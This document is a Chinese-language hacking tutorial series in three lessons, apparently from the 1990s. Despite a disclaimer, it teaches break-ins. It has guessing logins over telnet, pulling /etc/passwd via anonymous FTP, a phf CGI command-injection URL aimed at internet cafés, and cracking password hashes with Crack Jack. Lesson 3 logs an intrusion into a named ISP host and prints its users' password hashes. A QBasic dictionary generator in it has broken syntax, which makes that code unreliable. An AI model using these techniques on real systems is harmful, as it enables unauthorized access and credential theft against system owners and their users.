CoolFire系列讲座第1讲
作者:CoolFire [coolfires@https://www.doczj.com/doc/3e18594408.html,] (2001-10-12 15:00:00) CoolHC Volume 1 By CoolFire Author E-Mail: coolfires@https://www.doczj.com/doc/3e18594408.html,
这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全
的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的
电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不
是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不
负责!!
#1 甚么是Hacking ?
就是入侵电脑! 有甚么好解释的! 大部份有关介绍Hacker 的书籍或小说及文件等都有清楚的介绍, 沉迷於电脑的人... 破坏... 唉! 一大堆怪解释就是了, 最
好不要成为一个"骇客", 我... 不是!
#2 为甚么要Hack ?
我们只是为了要解更多关於系统的技术, 入侵它,了解它是如何运作的, 试试
它的安全性, 然後学著去使用它, 读取系统中有关操作的说明, 学习它的各项操作!! 为了安全性而作革命!
#3 Hack 守则
1. 不恶意破坏任何的系统, 这样作只会给你带来麻烦.
恶意破坏它人的软体将导致法律刑责, 如果你只是使用电脑, 那仅为非法使
用!! 注意: 千万不要破坏别人的软体或资料!!
2. 不修改任何的系统档, 如果你是为了要进入系统而修改它, 请在答到目的後
将它改回原状.
3. 不要轻易的将你要Hack 的站台告诉你不信任的朋友.
4. 不要在bbs 上谈论你Hack 的任何事情.
5. 在Post 文章的时候不要使用真名.
6. 正在入侵的时候, 不要随意离开你的电脑.
7. 不要侵入或破坏政府机关的主机.
8. 不在电话中谈论你Hack 的任何事情.
9. 将你的笔记放在安全的地方.
10. 想要成为Hacker 就要真正的Hacking, 读遍所有有关系统安全或系统漏洞
的文件(英文快点学好)!
11. 已侵入电脑中的帐号不得清除或修改.
12. 不得修改系统档案, 如果为了隐藏自己的侵入而作的修改则不在此限, 但仍须
维持原来系统的安全性, 不得因得到系统的控制权而将门户大开!!
13. 不将你已破解的帐号分享与你的朋友.
#4 破解之道
1. 进入主机中
2. 得到/etc/passwd
3. 得到系统帐号
4. 得到最高权限
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- How 1.
进入主机有好几种方式, 可以经由Telnet (Port 23) 或SendMail (Port 25)
或FTP 或WWW (Port 80) 的方式进入, 一台主机虽然只有一个位址, 但是它可能
同时进行多项服务, 所以如果你只是要"进入" 该主机, 这些Port 都是很好的进
行方向. 当然还有很多Port, 但是DayTime 的Port 你能拿它作甚么??? 我不知
道, 你知道吗?!
底下的示范并不是像写出来的那么容易, 只不过是要让你解如何进入, 当然其
中还有很多问题, 如打错指令...... 等等的毛病... 没有出现在课堂上, 但是我为了
面子.... 一定要删掉这些不堪入目的东西嘛...
示范进入主机的方法: (By CoolFire)
(首先要先连上某一台你已经有帐号的Telnet 主机, 当然最好是假的, 也就是Crack
过的主机, 然後利用它来Crack 别的主机, 才不会被别人以逆流法查出你的所在)
Digital UNIX (https://www.doczj.com/doc/3e18594408.html,) (ttypa)
login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0
(我用的是https://www.doczj.com/doc/3e18594408.html, ... 当然是假的罗, 都已经经过修改了啦!!
没有这一台主机啦!! 别怕! 别怕! 以下的主机名称都是假的名
称, 请同学们要记得!!)
Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)
(嗯... 进来了! 开始攻击吧! 本次的目标是......)
https://www.doczj.com/doc/3e18594408.html,> telnet https://www.doczj.com/doc/3e18594408.html, (Telnet 试试看....)
Trying 111.222.255.255...
Connected to https://www.doczj.com/doc/3e18594408.html,.
Escape character is '^]'.
Password:
Login incorrect
(没关系, 再来!!)
cool login: hinet
Password:
Login incorrect
cool login:
(都没猜对, 这边用的是猜的方法, 今天运气好像不好)
telnet> close
Connection closed.
(重来, 换个Port 试试看!!)
https://www.doczj.com/doc/3e18594408.html,> telnet 111.222.255.255 80
Trying 111.222.255.255...
Connected to 111.222.255.255.
Escape character is '^]'.
Invalid request "" (unknown method)
Connection closed by foreign host.
(哇哩!! 连密码都没得输入, 真是..... 再来!! 要有恒心!!)
(换FTP Port 试试)
https://www.doczj.com/doc/3e18594408.html,> ftp 111.222.255.255
Connected to 111.222.255.255.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (111.222.255.255:FakeName): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user! This is an experimental FTP server. If have any 230-unusual problems, please report them via e-mail to root@https://www.doczj.com/doc/3e18594408.html,
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
(哇! 可以用anonymous 进来耶!! password 部份输入aaa@ 就好了! 不要留下足迹喔!!)
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
etc
pub
usr
bin
lib
incoming
welcome.msg
226 Transfer complete.
(嗯嗯... 太好了! 进来了!! 下一个目标是.....)
ftp> cd etc
250 CWD command successful.
ftp> get passwd (抓回来!!)
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (566 bytes).
226 Transfer complete.
566 bytes received in 0.56 seconds (0.93 Kbytes/s)
(喔... 这么容易吗??)
ftp> !cat passwd (看看!!!)
root::0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/var/spool/news:
uucp:*:10:14:uucp:/var/spool/uucp:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
ftp:*:404:1::/home/ftp:/bin/bash
(哇哩... 是Shadow 的... 真是出师不利.... )
ftp> bye
221 Goodbye.
(不信邪.... 还是老话, 要有恒心....)
(FTP 不行, 再Telnet 看看!!)
https://www.doczj.com/doc/3e18594408.html,> telnet https://www.doczj.com/doc/3e18594408.html,
Trying 111.222.255.255...
Connected to https://www.doczj.com/doc/3e18594408.html,.
Escape character is '^]'.
Password:
Login incorrect
(又猜错!!)
cool login: fuckyou
Password:
Last login: Mon Dec 2 09:20:07 from 205.11.122.12
Linux 1.2.13.
Some programming languages manage to absorb change but withstand progress.
cool:~$
(哇哈哈!! 哪个笨root, 用system name 作username 连
password 也是system name.... 总算... 没白玩...)
cool:~$ system
bash: system: command not found
(嗯... 这个user 的权限好像不大....)
cool:~$ ls
cool:~$ pwd
/home/fuckyou
cool:~$ cd /
cool:/$ ls
Public/ cdrom/ lib/ mnt/ tmp/ www/
README dev/ linux* proc/ usr/
bin/ etc/ local/ root/ var/
boot/ home/ lost+found/ sbin/
cool:/$ cd etc
telnet> quit
(好想睡呀!! 不玩了!! 下节课再开始....)
Connection closed.
https://www.doczj.com/doc/3e18594408.html,> exit
(走了!! 下节课在见啦!! 今天就上到这里! 老师要先下班了!!)
(有学生说: 骗人! 还没有破解呀!! 胡说! 不是已经进来了吗???
看看这节课上的是甚么??? ---->进入主机!! 嗯.....)
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- How 2.
上节课抓回来一个"乱七八糟" 的/etc/passwd, 你以为我的真那么笨吗?? guest 所
抓回来的能是甚么好东西?? 所以这一节课继续上次的攻击行动. 上节课我们已经"猜" 到了一个不是guest 的username 及password. 今天就以它来进入主机瞧瞧!!
Digital UNIX (https://www.doczj.com/doc/3e18594408.html,) (ttypa)
login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0
Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)
(嗯... 进来了! 开始攻击吧! 本次的目标是.....呵...)
https://www.doczj.com/doc/3e18594408.html,> telnet https://www.doczj.com/doc/3e18594408.html, (Telnet 试试看.... 昨天的位址, 有作笔记吧!)
https://www.doczj.com/doc/3e18594408.html,> telnet https://www.doczj.com/doc/3e18594408.html,
Trying 111.222.255.255...
Connected to https://www.doczj.com/doc/3e18594408.html,.
Escape character is '^]'.
Password:
Login incorrect
cool login: fuckyou
Password: (一样输入fuckyou)
Last login: Mon Dec 1 12:44:10 from https://www.doczj.com/doc/3e18594408.html,
Linux 1.2.13.
cool:~$ cd /etc
cool:/etc$ ls
DIR_COLORS ftpusers localtime resolv.conf HOSTNAME gateways magic rpc NETWORKING group mail.rc securetty NNTP_INEWS_DOMAIN host.conf motd sendmail.cf
X11@ hosts messages/ sendmail.st
XF86Config hosts.allow mtab services
at.deny hosts.deny mtools shells bootptab hosts.equiv named.boot shutdownp csh.cshrc hosts.lpd networks snoopy/ csh.login httpd.conf nntpserver slip.hosts exports inetd.conf passwd snooptab fastboot inittab passwd.OLD syslog.conf fdprm issue passwd.old syslog.pid fstab ld.so.cache printcap ttys ftpaccess ld.so.conf profile utmp@
(找寻目标..... 太乱了! 懒得找, 再来....)
cool:/etc$ ls pa*
passwd passwd.OLD passwd.old
(果然在)
cool:/etc$ more passwd
(看看有没有Shadow...)
root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john
(正点! 一点都没有防备!!)
cool:/etc$ exit
logout
(走了!.... 换FTP 上场!!)
Connection closed by foreign host.
https://www.doczj.com/doc/3e18594408.html,> ftp https://www.doczj.com/doc/3e18594408.html,
Connected to https://www.doczj.com/doc/3e18594408.html,.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (https://www.doczj.com/doc/3e18594408.html,:66126): fuckyou
331 Password required for fuckyou.
Password:
230 User fuckyou logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /etc
250 CWD command successful.
ftp> get passwd
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (350 bytes).
226 Transfer complete.
350 bytes received in 0.68 seconds (1.9 Kbytes/s)
ftp> !cat passwd
root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john
(看看! 呵! 假不了!!......)
ftp> bye
221 Goodbye.
https://www.doczj.com/doc/3e18594408.html,> exit
(闪人罗!! 下课!!.... 喔慢点, 还有事要说明......)
passwd 的Shadow 就是把passwd 放在shadow 档中, 而你原先在第一节课所看到的这个格式的passwd 并不是真正的passwd....
root::0:0:root:/root:/bin/bash
因为密码的部份没有东西.... 所以拿了也没有用!! 但这一节课所拿到的东西呢, 像是这样, 有几点需要说明的, 就是它究竟代表著甚么???
john:234ab56:9999:13:John Smith:/home/john:/bin/sh
它以":" 分成几个栏位, 各栏位对照如下:
User Name: john
Password:234ab56
User No: 9999
Group No: 13
Real Name: John Smith
Home Dir: /home/john
Shell: /bin/sh
了吧! 了吧! 保留著你千辛万苦所拿到的passwd, 咱们第三节
课再来告诉各位如何使用Crack Jack 把passwd 解码.... 呵呵... zzZZzZzz...
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
Crack Jack V1.4 中文使用说明(By CoolFire 12-1-1996)
嗯... 该到第三课了!! 累了的同学先去喝口水吧!
这一节课咱们来说说Crack Jack ! 这可是个解读/etc/passwd 的好工具喔, 不要告诉我你习惯用
Brute, 拿Brute 跟Crack Jack 的速度比比看, 包准你马上投向Crack Jack 1.4 的怀抱, 但请
先确定你所使用的是Crack Jack 1.4, 你可以在CoolFire 的Hacker&Mailer Page 中拿到这个版
本的Crack Jack ! 这才是真正有用的版本, 速度... 对... 就是这点别人都比不上! 但还是要讲
讲它的缺点... 就是只能在DOS 跟OS2 中跑, 如果在Windoz 95 上开个DOS Mode 跑, 它可是连
理都不会理你的!
OK! 现在切入正题! etc/passwd 拿到手了吧!! 开始罗!! 使用Crack Jack 1.4 前所需要的东
西有这些[1] Crack Jack 1.4 (废话...$%^&@@) [2] /etc/passwd 档案, 你可以在Unix 系统中
的/etc/ 目录中找到passwd [3] 字典档(哪里找, 自己敲... 呵ClayMore 中有一份DIC.TXT
是有一千多个字的字典, 但比起我的字典可就小巫见大巫了, LetMeIn! 1.0 里面也有, 听James
说 2.0 Release 的时候会有更棒的字典档含入, 期待吧!).... 使用Crack Jack 1.4 前需先确
定你所使用的机器是386 含以上CPU 的! 然後最好有充足的记忆体!!
开始Jack 时只要敲入JACK 即可, 它会问你PW Name... 输入你的passwd 档名, Dictionary
Name 输入你的字典档名, Jack 就会开始找了! 找到时会告诉你, 也会在JACK.POT 中写入它所
找到的密码!! 但... 有点怪的格式! 如果找到的是具root 权限的密码, Jack 会告诉你This is
JackAss... 嗯...说脏话了!! 因为使用Jack 占用的时间实在太多, 如果你中途想要停掉时只要
按下Ctrl-C 即可, 别以为你前功尽弃了! 因为Jack 有个Restore 的功能, 中断时会自动存档
为RESTORE, 下次要继续这次的寻找只要输入Jack -Restore:RESTORE 即可!! 当然你也可以为
你的Restore 重新命名! Jack 也会找得到的... 如Ren restore restore.HNT 之後要再寻找
的时後就Jack -Restore:RESTORE.HNT 即可... Jack 会很自动的Restore 前次所寻找的字串...
继续帮你找下去....
字典档哪里找: 我的不给你! 可以找别的Brute Force 之类的程式, 有些里面会附, 或是找找其它
的Hacker 地下站看看有没有, 自己编一个, 或找个英汉字典软体将字典的部份解出来, 可能要有
一点资料栏位及写程式的基础.
[这一节课没有范例] 成功的案例: 找到过某家网路咖啡店的root 权限密码! Jack 好正点呀!!!
所花的时间: 20 分钟左右... 但也有找了一两天也找不到的..... 呜... 骇客们! 加油吧!!
继续
CoolFire系列讲座第2讲
作者:CoolFire [coolfires@https://www.doczj.com/doc/3e18594408.html,] (2001-10-12 15:00:00) CoolHC Volume 1By CoolFire Author E-Mail: coolfires@https://www.doczj.com/doc/3e18594408.html,
这不是一个教学文件, 只是告诉你该如何破解系统,
好让你能够将自己的系统作安全的保护, 如果
你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是
CoolFire, 写
这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件
导致恶意入侵别人的电脑或网路, 本人概不负责!!
话说上次CoolFire 讲到许多的Net Coffee 店, 安全性之差实在是没话说,
但是过了这麽久也不
见有几家改进, 可能是想让自己的电脑被别人玩弄在股掌之间吧, 但可不是每个人都像
CoolFire
这样温和, 如果遇到的是比较狠一点的角色, 那你的Net Coffee 可能要有一两天只卖
Coffee 而
没办法再Net 下去了!!
继CoolHC#1 推出後, 有许多人是否已经跃跃愈试了呢?? 这次咱们不谈新的花招,
用用之前所讲
的再来探险一番, 当然, 这一次我照往例还是不会使用真正的Domain Name 来作教学,
但是课程
中的所有内容绝对属实, 当然本次攻击的对象还是.... Net Coffee Shop....
**谈一下Crack Jack 猜猜密码
许多人从上一次介绍Crack Jack 之後就应该已经领教过它的功力了,
但是有几点需要说明的,
有些人使用Jack 来帮你寻找password, 我就当你已经抓到了没有shadow 的/etc/passwd,
但是为甚麽使用Jack 还是找不到呢?? 我想你应该要换个正点一点的字典档了, 因为
Jack 还
是根据你所提供的字典档在寻找, 如果你提供的字典本身就没有这些字,
那当然连一个小小帐号
的密码你都别想猜到了. 数一下你所使用的字典档中有多少字???
我用的字典档有十九万多个
字, 你的呢? 是不是小巫见大巫呀?? 那麽就赶快充实一下字典档再重新寻找吧!!
许多人的密码都有一定的法则, 我自己写了PaSs2DiC 就是将UserName 由passwd档转成字典档
的工具, 这是对一些喜欢使用UserName 当作Password 的人最好的方式,
但是也曾经好运的找到
别人的密码, 真不晓得"甲"是不是暗恋"乙"才用"乙"的ID 作为密码的???
你可以很简单的使用
Qbasic 来制作"序数" 密码, 或日期密码, 底下简单的作一个0101 (一月一日) 到
1231 的密码
档出来:
------------Cut Here MakeDate.BAS -------------------
Open "Dates" for output as #1
for I=1 to 12
for J=1 to 31
I1$=rtrim$(ltrim$str$(I)))
J1$=rtrim$(ltrim$str$(J)))
if len(I1$)=1 then I1$="0"+I1$
if len(J1$)=1 then J1$="0"+J1$
Out$=I1$Content$J1$
print #1,Out$
next I
next J
close
------------ Cut Here End MakeDate.BAS ----------------
这支小程式将会写一个"DATES" 的档案, 里面就是你要的字典, 当然啦,
这只是包含月跟日!!
如果你要猜的密码是含年份的, 你可能要再增加一些程式码, 再Run 一次试试看了,
不过这是一
个好的开始不是吗??
**如何保护自己的密码
谈了这麽多的密码猜法, 当然要谈一下如何保护自己的密码不被破解,
请遵守以下的原则: [1]不
用生日作为密码(太容易猜了啦) [2]不用序数作为密码(除非你的序数无限大) [3]不用身份证字号
作为密码(LetMeIn! 里有猜身份证字号的功能耶)
[4]不用在字典中查得到的字作为密码.
那麽依照上面的几点说法, 甚麽样子的密码最不容易猜, 自己也最好记呢?? 答案是:
用一句有意
义的话来作为自己的密码, 例如: NoOneCanCrackIt 就是一个很难猜的密码类型, 基於这个密码猜
法的原则, 你的密码是不是要作些更新, 或是大小写要作一些对调?? 如果你的密码是
coolfire,
建议你最好能改成CoolFire 或coolfires (加复数"s"),
这样被猜中的机率就小了很多. 如果
你是一个Hacker, 你的密码也被人猜中的话... 那...#%%^^^&@
**正式的话题
这次的话题当然还是Crack, 相信许多人已经看过CoolHC#1 了,
当然眼尖的人可能也已经D/L
System Holes 试过了, 你有成功的例子吗?? 如果没有, 这份CoolHC#2
可能就是你的强心针,
因为这次谈的正是System Holes #1 成功的案例.
Step 1. 连线到"蕃薯藤" 找"网路咖啡" 找到好多家网路咖啡的WWW 网址, 一一连上去试试看
在System Holes #1 中的方法可不可行.
Step 2. 若可行则会传回/etc/passwd 资讯, 存档後迅速Logout, 使用Crack Jack
解读!!
[[实例探讨]]
System Holes #1 中所介绍的WWW 入侵法是这样子的:
https://www.doczj.com/doc/3e18594408.html,/cgi-bin/nph-test-cgi?* 後再
https://www.doczj.com/doc/3e18594408.html,/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd
[1] 用WWW Browser 连到https://www.doczj.com/doc/3e18594408.html,
[2] Location 输入--> "https://www.doczj.com/doc/3e18594408.html,/cgi-bin/nph-test-cgi?*"
[3] 接著如果出来一份像Report 的画面的话, 接著输入
/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
[4] 发生了甚麽事?? etc/passwd 在你的浏览器中"显示" 出来了!! 快点Save 吧
!!
这个方法所用的是系统"检索" 的漏洞, 不提供这个功能,
或是伺服器检索类型不同的机器则不
会接受这样的指令, 当然也就逃过我们这次的模拟演练啦!! 但是.... 相信我,
你一定会找到一
家脱线的网路咖啡, 并没有像我们一样每天阅读Mail List 的信,
对系统安全一点研究也没有的
人不在少数. https://www.doczj.com/doc/3e18594408.html, 就是这样的一个Net Coffee Shop... 呵.... 快来试
试吧!!
当CoolFire 抓到/etc/passwd 後, 立刻存档, 也马上断线, 并且拿出UltraEdit 来瞧一下使用
者的资讯, 当然这个小passwd 对Crack Jack 来说, 实在是不够看,
没几分钟就在我的486 机
器上显示出来几个以UserName 作为Password 的资讯(归功於PaSs2DiC 及CrackJack 的功劳)
不过当我试著找寻root 的密码时, 一想到我那将近20 万字的字典档,
就想到可能花费的时间一
定相当的惊人, 於是就以Jack 的Option 设定只寻找root 那一行, ...
(过了良久)... 果不然
又是一个笨root. 用了"非常" 容易猜的密码... <--- This is JackAss... 呵!! Got
It!
如果你所使用的机器速度不是顶快, 你最好能够到快一点的机器上使用Crack Jack,
不然你也可
以将字典档切割成几个小档案, 然後再分别在几台机器上跑, 我目前使用的配备是
486DX4-130
32MB RAM, 3.2GB HDD, 近20 万字的字典档, 如果在分析较大的passwd
档时我会将字典档切割
为四至五个小档(看有多少台机器可跑),
然後在周末下班前在公司的几台机器上分别执行Crack
Jack, 等到礼拜一上班时就等著接收成果了! 当然如果你只有一台机器, passwd 档又很大的话,
由於Crack Jack 无法於Windoz 95 下使用, 你可能只能牺升时间或机器来跑了! 再没有办法的
话, 亦可使用单机多工, 多开几个DOS Box 来跑Brute, 也许也是一个可行的办法!
**後语
有许多人在使用Crack Jack 的时候有许多问题, 不过看了CoolHC#1 应该都解决了吧
?? 最近大
家问的比较多的是UpYours 3.0, 虽然已经改进了Install 的问题,
不过大家的问题还是都出在
Winsck.ocx 上面, 有人说装了MSICP Beta 会好?? 但也有实例装了也还不能Run 的,
在此建议
大家不要再玩MailBomb 了, 虽然我喜欢收集这种东西, 但还是少乱炸为妙,
已经证实有许多常用
的MailBomb 没有办法Fake IP 了!! 所以... 如果UpYours 3.0
装不起来的人就试试KaBoom!
V3.0 吧! 虽然没有办法Fake IP (选错Mail Server 的话), 但是也是一个不错的AnonyMailer
如果要发匿名信, 现在首页上有可以帮你发信的Mailer, 会安全一点.
如果你仍旧对UpYours 3.0 不死心, 就试试ResSvr32.exe (Under Windows/system
directory),
看看能不能将WinSck.ocx 装上了... 记得先UnReg 再Reg...
在此建议大家可以多订阅一些"系统安全" 讨论的Mail List
或多参考一些已经被找出来的系统
漏洞, 因为有些人对这些方面并不是很重视, 所以这些资讯也就显得格外的重要了,
如果能够多
参考一些资讯, 在你入侵的时候会有很大的帮助, 当然, 如果你能作出一份列表出来,
放在手边
参考的话, 就可以快速的; 安全的入侵了!! 下一次所谈的是SendMail 的Bug 实例,
在这中间
当然照往例会先出一份System Holes #2 来作为资料. 如果有兴趣的人在SH#2 出来的时候可以
先研究看看. 下次见! Merry X'Mas..... & Happy New Year.......
------
上次讲的Home Page 建置案还没搞完, 没有充实一下Home Page 实在是对不起大家,
所以利用一点
时间写了CoolHC#2, 可能报告又交不出来了!! 老话,
如果你有兴趣写其它程式的中文说明, 请完
成後寄一份给我, 我将它放在Home Page 上面让其它人参考,
当然你也可以给我你的使用心得, 让
别人参考看看也行! 目前准备收集一系列的System Hole List,
如果你在其它的站台有看到的, 请
把它先Cut 下来, Mail 一份给我!
------
再次重申, Crack 别人站台之後不要破坏别人站台中的资料, 此篇文章仅作为教育目的,
不主张你随
便入侵他人主机.... (高-Net 还是除外)... 请勿将这类技术使用於破坏上(又...
如果第三次世界
大战开打, 你可以任意破坏敌国的电脑网路... 我全力支持),
最严重的情况(如果你真的很讨厌该主
机的话)... 就将它Shut Down.... 好了! 别太暴力了!
CoolFire系列讲座第3讲:如何连接ISP并且对其解码
作者:CoolFire [coolfires@https://www.doczj.com/doc/3e18594408.html,] (2001-10-13 08:05:00) CoolHC Volume 3 By CoolFire Author E-Mail: coolfires@https://www.doczj.com/doc/3e18594408.html,
这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果
你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写
这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件
导致恶意入侵别人的电脑或网路, 本人概不负责!!
前几次说到了Net Coffee 店, 还好他们没有提供客户拨接上线的功能, 不然密码或是帐号被人盗用
的客户不就糗大了! 但是CoolFire 在这两周的探险中, 为了找一个酷似网路咖啡站台的W3 密码,
误入一个号称第一个提供网路拨接的ISP, 且在CoolFire 顺利的抓回/etc/passwd 之後, 使用了自己
写的PaSs2DiC + CJack 来解出密码, 没想到不用 1 分钟, 就找出了9 组ID 与Password 相同的密码,
勿怪我没有在这里提醒大家, 还好我没有找到root password, 不然可能该系统就此停摆, 不可再见
天日也! (当然我不可能这么作啦!).
看看最近兴起的网路咖啡及各大网站的系统安全设施, 再加上CoolFire 最近开会的时候遇到的情
况, 不难发现我们的国家正往高科技的领域快步迈进, 但是这些系统的安全性若不加强, 可能到时
候人家只要一台电脑再加上一台数据机就可以让整个国家的金融及工商业崩溃! 大家要小心呀!
ISP 是一般User 拨接的源头, 技术上理应比较强, 但还是轻易让人入侵, 且又没有教导User 正确
的网路使用观念(Password 的设定及proxy 的使用等), 实在不敢想像这样的网路发展到几年後会
是甚么样子??
这一次的说明还是没有谈到新的技巧, 在James 将首页更新後各位应该已经可以从中学到许多东
西了, 如果想要学习入侵, 就一定要知道最新的资讯(入侵本国的网路则不用, 反正没人重视网路
安全..... 真失望), 在别人还没将Bug 修正之前就抢先一步拿到/etc/passwd, 所以订阅一些网路安全
的Mail List 是必要的, 多看一些网安有关的News Group 也是必要的(不仅Hacker 如此, ISP 更要
多注意这些资讯!). 日後有空再整里一些Mail List 给大家!!
本次主题: 说明如何连接该ISP 并且对其/etc/passwd 解码
连接位址: https://www.doczj.com/doc/3e18594408.html, (203.66.169.11)
特别说明: 由於本次主题说明重点使用真实的位址及名称, 所以CoolFire 已经Mail 给该网页之维
护人员更改密码, 但该网页之ISP 仍为新手之练习好题材! CoolFire Mail 给该网页维护
人员之信件内容如下, 如果他还不尽快改掉, 我也没办法了!
Mail sent to dhacme@https://www.doczj.com/doc/3e18594408.html,:
Subject: 请速更动网页密码
From: CoolFire
你的网页作得不错, 但是因为你所设定的密码太容易为骇客所
? 入侵, 请於见到此信後速速更改你的网页进入密码, 否则下次
若网页遭到篡改, 本人概不负责!!
**** 课程开始****
请注意: 由於本次所作的课程内容以实作为主, 除了本人IP 有所更改, 一切都使用本人所用之
Telnet 软体Log 档收录, 故若道德感不佳者请勿阅读以下之详细破解内容, 否则本人概不负责!
(连线到某一主机之後.... 此处的https://www.doczj.com/doc/3e18594408.html,.tw 是假的Domain name)
https://www.doczj.com/doc/3e18594408.html,.tw> telnet https://www.doczj.com/doc/3e18594408.html,
Trying 203.66.169.11...
Connected to https://www.doczj.com/doc/3e18594408.html,.
Escape character is '^]'.
Password: (随便按一下Enter)
Login incorrect
www login: coffee (以Hacker 的敏锐判断username=coffee password=coffee)
Password:
Last login: Thu Jan 9 10:41:52 from https://www.doczj.com/doc/3e18594408.html,.tw
欢迎光临....... 以下略! 因涉及该ISP 的名誉, 大家自己去看吧!
================================================================= (直接进入核心部份)
www:~$ cd /etc
www:/etc$ ls
DIR_COLORS hosts.equiv printcap
HOSTNAME hosts.lpd profile NETWORKING inet@ protocols
NNTP_INEWS_DOMAIN inetd.conf psdevtab
X11@ inittab rc.d/
at.deny inittab.gettyps.sample resolv.conf
bootptab ioctl.save rpc
csh.cshrc issue securetty
csh.login https://www.doczj.com/doc/3e18594408.html, securetty.old
default/ klogd.pid sendmail.cf
diphosts ld.so.cache sendmail.st
exports ld.so.conf services
fastboot lilo/ shells
fdprm lilo.conf shutdownpid
fs/ localtime skel/
fstab magic slip.hosts
ftp.banner mail.rc slip.login
ftp.deny motd snooptab
ftpaccess motd.bak sudoers
ftpconversions msgs/ syslog.conf
ftpgroups mtab syslog.pid
ftpusers mtools termcap
gateways named.boot ttys
gettydefs networks utmp@
group nntpserver vga/
host.conf passwd wtmp@
hosts passwd.OLD yp.conf.example hosts.allow passwd.old
hosts.deny ppp/
(看看我们的目标长得如何???)
www:/etc$ cat passwd
root:abcdefghijklmn:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-1:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
shan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bash
fax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash
tham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash
ccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bash
sk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bash
services:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash order:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash corey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bash
richard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bash
